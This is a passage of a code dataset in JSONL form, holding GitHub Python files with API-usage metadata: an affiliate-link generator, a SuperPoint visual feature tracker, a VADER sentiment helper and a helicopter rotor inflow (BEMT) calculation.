"line_number": 273, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 276, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 277, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERAL", "line_number": 281, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 281, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 285, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 287, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 289, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 205, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 295, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 295, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 295, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_last_user_intent_event", "line_number": 307, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_NEXT_STEPS", "line_number": 323, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 323, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.params.llm_params", "line_number": 329, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 330, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_NEXT_STEPS", "line_number": 334, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 334, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_first_nonempty_line", "line_number": 339, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 348, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 350, "usage_type": "call"}, {"api_name": 
"nemoguardrails.actions.actions.ActionResult", "line_number": 359, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 360, "usage_type": "call"}, {"api_name": "nemoguardrails.language.parser.parse_colang_file", "line_number": 369, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 375, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 377, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 386, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 389, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 391, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 397, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 293, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 402, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 415, "usage_type": "call"}, {"api_name": "jinja2.meta.find_undeclared_variables", "line_number": 421, "usage_type": "call"}, {"api_name": "jinja2.meta", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 436, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 436, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 436, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_last_bot_intent_event", "line_number": 445, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 453, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 456, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.get_retrieved_relevant_chunks", "line_number": 481, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_BOT_MESSAGE", "line_number": 484, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 484, "usage_type": "name"}, {"api_name": "time.time", "line_number": 489, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 490, "usage_type": "call"}, {"api_name": "time.time", "line_number": 492, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_BOT_MESSAGE", "line_number": 497, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 497, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_multiline_response", "line_number": 502, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.strip_quotes", "line_number": 503, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 513, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 515, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 520, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 522, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 434, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 533, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 534, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 535, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 535, "usage_type": "name"}, 
{"api_name": "re.findall", "line_number": 565, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_VALUE", "line_number": 569, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 569, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.params.llm_params", "line_number": 578, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 579, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_VALUE", "line_number": 583, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 583, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 597, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 529, "usage_type": "call"}]}
+{"seq_id": "17997494700", "text": "#-*- coding: utf-8 -*-\n\nimport os\nimport xlrd\n#import urllib3\nimport tldextract\nfrom shortener import Shortener\n\nclass PpomppuLinkGenerator:\n LINKPRICE_ID = 'A100528376'\n\n def __init__(self):\n self.listLinkPrice = self.getLinkPriceData()\n\n def getShortener(self, url=None):\n shortener = Shortener()\n return shortener.genShortenerBitly(url=url)\n\n def genLink(self, url=None):\n extracted = tldextract.extract(url)\n domain = \"{}.{}\".format(extracted.domain, extracted.suffix)\n\n if domain in self.listLinkPrice.keys():\n return self.getShortener(url=self.getLinkLinkPrice(key=self.listLinkPrice[domain], url=url))\n #return self.getLinkLinkPrice(key=self.listLinkPrice[domain], url=url)\n\n return False\n\n def getLinkPriceData(self):\n data = dict()\n\n wb = xlrd.open_workbook(os.path.join(os.path.join(os.path.dirname(__file__), 'data'), 'linkprice.xlsx'))\n\n # Get the first sheet either by index or by name\n sh = wb.sheet_by_index(0)\n\n # Iterate through rows, returning each as a list that you can index:\n for rownum in range(sh.nrows):\n if rownum == 0:\n continue\n\n extracted = tldextract.extract(sh.row_values(rownum)[1])\n domain = \"{}.{}\".format(extracted.domain, extracted.suffix)\n\n if len(domain) > 0:\n if len(sh.row_values(rownum)[0]) > 0:\n data[domain] = sh.row_values(rownum)[0]\n\n\n return data\n\n def getLinkLinkPrice(self, key=None , url=None):\n if key is None or url is None:\n return False\n\n #url = urllib3.parse.quote_plus(url)\n\n return 'http://click.linkprice.com/click.php?m=%s&a=%s&l=9999&l_cd1=3&l_cd2=0&tu=%s' % (key, self.LINKPRICE_ID, url)\n\nif __name__ == \"__main__\":\n ppomppuLinkGenerator = PpomppuLinkGenerator()\n #print(ppomppuLinkGenerator.genLink(url='http://item.gmarket.co.kr/detailview/item.asp?goodscode=1401721949'))", "repo_name": "ko9ma7/crawler-1", "sub_path": "ppomppu_link_generator.py", "file_name": "ppomppu_link_generator.py", "file_ext": "py", "file_size_in_byte": 2003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "shortener.Shortener", "line_number": 16, "usage_type": "call"}, {"api_name": "shortener.genShortenerBitly", "line_number": 17, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 20, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 32, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "4960423192", "text": "import cv2\nimport copy\nimport numpy as np \nfrom time import time\n\nfrom utils.feature_process import PointTracker\nfrom utils.feature_process import SuperPointFrontend_torch, SuperPointFrontend\nrun_time = 0.0\nmatch_time = 0.0\n\nmyjet = np.array([[0. , 0. , 0.5 ],\n [0. , 0. , 0.99910873],\n [0. , 0.37843137, 1. ],\n [0. , 0.83333333, 1. ],\n [0.30044276, 1. , 0.66729918],\n [0.66729918, 1. , 0.30044276],\n [1. , 0.90123457, 0. ],\n [1. , 0.48002905, 0. ],\n [0.99910873, 0.07334786, 0. ],\n [0.5 , 0. , 0. ]])\n\n\nclass VisualTracker:\n\tdef __init__(self, opts, cams):\n\n\t\tself.forwframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None,\n\t\t\t\t}\n\n\t\tself.curframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None\n\t\t\t\t}\n\t\n\t\tself.camera = cams\n\t\tself.new_frame = None\n\t\tself.allfeature_cnt = 0\n\t\t\n\t\tself.cuda = opts.cuda\n\t\tself.scale = opts.scale\n\t\tself.max_cnt = opts.max_cnt\n\t\tself.nms_dist = opts.nms_dist\n\t\tself.nn_thresh = opts.nn_thresh\n\t\tself.no_display = opts.no_display\n\t\tself.width = opts.W // opts.scale\n\t\tself.height = opts.H // opts.scale\n\t\tself.conf_thresh = opts.conf_thresh\n\t\tself.weights_path = opts.weights_path\n\n\t\t# SuperPointFrontend_torch SuperPointFrontend\n\t\tself.SuperPoint_Ghostnet = SuperPointFrontend_torch(\n\t\t\tweights_path = self.weights_path, \n\t\t\tnms_dist = self.nms_dist,\n\t\t\tconf_thresh = self.conf_thresh,\n\t\t\tcuda = self.cuda\n\t\t\t)\n\t\t\n\t\tself.tracker = PointTracker(nn_thresh=self.nn_thresh)\n\n\tdef undistortedLineEndPoints(self, scale):\n\n\t\tcur_un_pts = copy.deepcopy(self.curframe_['keyPoint'])\n\t\tids = copy.deepcopy(self.curframe_['PointID'])\n\t\tcur_pts = copy.deepcopy(cur_un_pts * scale)\n\n\t\tfor i in range(cur_pts.shape[1]):\n\t\t\tb = self.camera.liftProjective(cur_pts[:2,i])\n\t\t\tcur_un_pts[0,i] = b[0] / b[2]\n\t\t\tcur_un_pts[1,i] = b[1] / b[2]\n\n\t\treturn cur_un_pts, cur_pts, ids\n\n\n\tdef readImage(self, new_img):\n\n\t\tassert(new_img.ndim==2 and new_img.shape[0]==self.height and new_img.shape[1]==self.width), \"Frame: provided image has not the same size as the camera model or image is not grayscale\"\n\t\t\n\t\tself.new_frame = new_img\n\n\t\tfirst_image_flag = False\n\n\t\tif not self.forwframe_['PointID']:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\tself.curframe_['image'] = self.new_frame\n\t\t\tfirst_image_flag = True\n\n\t\telse:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\n\t\t######################### 提取关键点和描述子 ############################\n\t\tprint('*'*10 + \" current frame \" + '*'*10)\n\t\tstart_time = time()\n\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.015)\n\n\t\tglobal run_time\n\t\trun_time += ( time()-start_time )\n\t\tprint(\"run time is :\", run_time)\n\n\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\tprint(\"current keypoint size is :\", keyPoint_size)\n\n\t\tif keyPoint_size < 
self.max_cnt-50:\n\t\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.01)\n\t\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\t\tprint(\"next keypoint size is \", keyPoint_size)\n\n\t\t\n\n\t\tfor _ in range(keyPoint_size):\n\t\t\tif first_image_flag == True:\n\t\t\t\tself.forwframe_['PointID'].append(self.allfeature_cnt)\n\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\telse:\n\t\t\t\tself.forwframe_['PointID'].append(-1)\n\t\t\n\t\t##################### 开始处理匹配的特征点 ###############################\n\t\tif self.curframe_['keyPoint'].shape[1] > 0:\n\t\t\tstart_time = time()\n\t\t\tfeature_matches = self.tracker.nn_match_two_way( \n\t\t\t\t\t\t\t\t\tself.forwframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.curframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.nn_thresh\n\t\t\t\t\t\t\t).astype(int)\n\t\t\tglobal match_time\n\t\t\tmatch_time += time()-start_time\n\t\t\tprint(\"match time is :\", match_time)\n\t\t\tprint(\"match size is :\", feature_matches.shape[1])\n\t\t\t######################## 保证匹配得到的lineID相同 #####################\n\t\t\tfor k in range(feature_matches.shape[1]):\n\t\t\t\tself.forwframe_['PointID'][feature_matches[0,k]] = self.curframe_['PointID'][feature_matches[1,k]]\n\n\t\t\t################### 将跟踪的点与没跟踪的点进行区分 #####################\n\t\t\tvecPoint_new = np.zeros((3,0))\n\t\t\tvecPoint_tracked = np.zeros((3,0))\n\t\t\tPointID_new = []\n\t\t\tPointID_tracked = []\n\t\t\tDescr_new = np.zeros((256,0))\n\t\t\tDescr_tracked = np.zeros((256,0))\n\n\t\t\tfor i in range(keyPoint_size):\n\t\t\t\tif self.forwframe_['PointID'][i] == -1 :\n\t\t\t\t\tself.forwframe_['PointID'][i] = self.allfeature_cnt\n\t\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\t\t\tvecPoint_new = np.append(vecPoint_new, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_new.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_new = np.append(Descr_new, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_tracked.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\n\t\t\t########### 跟踪的点特征少于150了,那就补充新的点特征 ###############\n\n\t\t\tdiff_n = self.max_cnt - vecPoint_tracked.shape[1]\n\t\t\tif diff_n > 0:\n\t\t\t\tif vecPoint_new.shape[1] >= diff_n:\n\t\t\t\t\tfor k in range(diff_n):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tfor k in range(vecPoint_new.shape[1]):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\n\t\t\tself.forwframe_['keyPoint'] = vecPoint_tracked\n\t\t\tself.forwframe_['PointID'] = PointID_tracked\n\t\t\tself.forwframe_['descriptor'] = Descr_tracked\n\n\t\tif not self.no_display :\t\n\t\t\tout1 = (np.dstack((self.curframe_['image'], self.curframe_['image'], self.curframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.curframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.curframe_['keyPoint'][0,i]))-3, 
int(round(self.curframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.curframe_['keyPoint'][0,i]))+3, int(round(self.curframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.curframe_['keyPoint'][0,i])), int(round(self.curframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out1, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out1, pt2, 2, (255, 0, 0), -1)\n\t\t\t\t# cv2.putText(out1, str(self.curframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX , 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out1, 'pre_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tout2 = (np.dstack((self.forwframe_['image'], self.forwframe_['image'], self.forwframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.forwframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.forwframe_['keyPoint'][0,i]))-3, int(round(self.forwframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.forwframe_['keyPoint'][0,i]))+3, int(round(self.forwframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.forwframe_['keyPoint'][0,i])), int(round(self.forwframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out2, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out2, pt2, 2, (0, 0, 255), -1)\n\t\t\t\t# cv2.putText(out2, str(self.forwframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out2, 'cur_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tmin_conf = 0.001\n\t\t\theatmap[heatmap < min_conf] = min_conf\n\t\t\theatmap = -np.log(heatmap)\n\t\t\theatmap = (heatmap - heatmap.min()) / (heatmap.max() - heatmap.min() + .00001)\n\t\t\tout3 = myjet[np.round(np.clip(heatmap*10, 0, 9)).astype('int'), :]\n\t\t\tout3 = (out3*255).astype('uint8')\n\n\t\t\tout = np.hstack((out1, out2, out3))\n\t\t\tout = cv2.resize(out, (3*self.width, self.height))\n\n\t\t\tcv2.namedWindow(\"feature detector window\",1)\n\t\t\t# cv2.resizeWindow(\"feature detector window\", 640*3, 480)\n\t\t\tcv2.imshow('feature detector window',out)\n\t\t\tcv2.waitKey(1)\n\n\t\tself.curframe_ = copy.deepcopy(self.forwframe_)\n\n", "repo_name": "GuoFeng-X/CNN_VINS", "sub_path": "Visual-Front/feature_match.py", "file_name": "feature_match.py", "file_ext": "py", "file_size_in_byte": 8757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 39, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.feature_process.SuperPointFrontend_torch", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.feature_process.PointTracker", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 67, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 68, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": 
"time.time", "line_number": 109, "usage_type": "call"}, {"api_name": "time.time", "line_number": 131, "usage_type": "call"}, {"api_name": "time.time", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 190, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 193, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 195, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 201, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 203, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 203, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 212, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 215, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 217, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 218, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 220, "usage_type": "call"}]}
+{"seq_id": "22903032501", "text": "from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nimport numpy as np\n\n\n####### Write your primary function here\ndef sentiment_scores(sentence):\n sent_keys = [\"Negative\", \"Neutral\", \"Positive\"]\n # Create a SentimentIntensityAnalyzer object.\n sid_obj = SentimentIntensityAnalyzer()\n\n # polarity_scores method of SentimentIntensityAnalyzer\n # object gives a sentiment dictionary.\n sentiment_dict = sid_obj.polarity_scores(sentence)\n sent_values = [x for x in sentiment_dict.values()]\n sent_values=sent_values[:3]\n # find the index of the max value\n\n index_max = np.argmax(sent_values)\n\n # decide sentiment as positive, negative and neutral\n final = sent_keys[index_max]\n # responses\n response1=f\"Overall sentiment is {final} with scores: {sentiment_dict}\"\n return response1\n", "repo_name": "plotly-dash-apps/603-movie-reviews-sentiment", "sub_path": "helpers/vader.py", "file_name": "vader.py", "file_ext": "py", "file_size_in_byte": 835, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "10659317267", "text": "## Minor Project code - 2\n## Coded by : G R Krishna Chand Avatar, Kumar Gaurav, Kashish Korotania\n## BEMT - Inflow Distribution and including the Tip Losses\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef prandtl_tip_loss(r,theta):\n global N_b, sol, cl_a, lam_c\n err = 1\n lam_old = (sol*cl_a/16)*(math.sqrt(1 + 32*theta*r/(sol*cl_a)) - 1)\n while(err > 1e-5):\n f = 0.5*N_b*(1-r)/lam_old \n\t\t# f_root = 0.5*N_b*r**2/(1-r)/lam_old\n F = (2/math.pi)*math.acos(math.exp(-f))\n # lam_new = (sol*cl_a/(16*F))*(math.sqrt(1 + 32*F*theta*r/(sol*cl_a)) - 1)\n lam_new = - (sol*cl_a/(16*F) - lam_c/2) + math.sqrt((sol*cl_a/16/F - lam_c/2)**2 + sol*cl_a*theta*r/8/F)\n err = abs(lam_new - lam_old)\n lam_old = lam_new\n return(lam_old) \n# Constant Parameters\nsol = 0.0578 #Solidity\ncl_a = 6.28 #Cl_a\nN_b = 4 #Number of Blades\nlam_c = 0.1 # Non-dimensional axial velocity\n#Initialising Parameters \nr = np.linspace(0,0.999999,500)\nN = len(r)\n# Computation for varying theta\ntheta_o = 10 # pitch angle at root\ntheta_tw = -2.5 # linear twist rate\nth = [] # Theta - pitch angle distribution\ndel_ct = [] # Coefficient of thrust\nlam = [] # Inflow distribution\nlam_no_tip = [] \ndel_ct_no_tip = [] \nfor i in range(N):\n theta = theta_o + theta_tw*r[i]\n th = th + [theta*math.pi/180]\nfor i in range(N):\n lam_t = prandtl_tip_loss(r[i],th[i])\n lam = lam + [lam_t]\n lam_no_tip_t = -(sol*cl_a/16 - lam_c/2) + math.sqrt((sol*cl_a/16 - lam_c/2)**2 + sol*cl_a*th[i]*r[i]/8)\n lam_no_tip = lam_no_tip + [lam_no_tip_t]\n del_ct_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_t*r[i])\n del_ct = del_ct + [del_ct_t]\n del_ct_no_tip_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_no_tip_t*r[i])\n del_ct_no_tip = del_ct_no_tip + [del_ct_no_tip_t]\n\n# Plotting \nplt.plot(r,lam,'b', label='BEMT+Vortex theory')\nplt.plot(r,lam_no_tip, 'm--', label='BEMT')\nplt.xlabel('Non-dimensional radius (r)')\nplt.ylabel('Inflow ratio (lambda)')\nplt.legend(loc=4)\nplt.xticks(np.arange(0,1.1,0.1))\n#plt.ylabel('Inflow ratio (lam)')\nplt.grid(True)\nplt.title('Inflow ratio distribution for theta_root = '+str(theta_o)+' degrees, linear twist rate = '+ str(theta_tw))\nplt.show()\n", "repo_name": "kcavatar/helicopters", "sub_path": "bemt/bemt_including_tip_loss_inflow.py", "file_name": "bemt_including_tip_loss_inflow.py", "file_ext": "py", "file_size_in_byte": 2257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 14, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 14, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 14, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 26, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 38, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]}
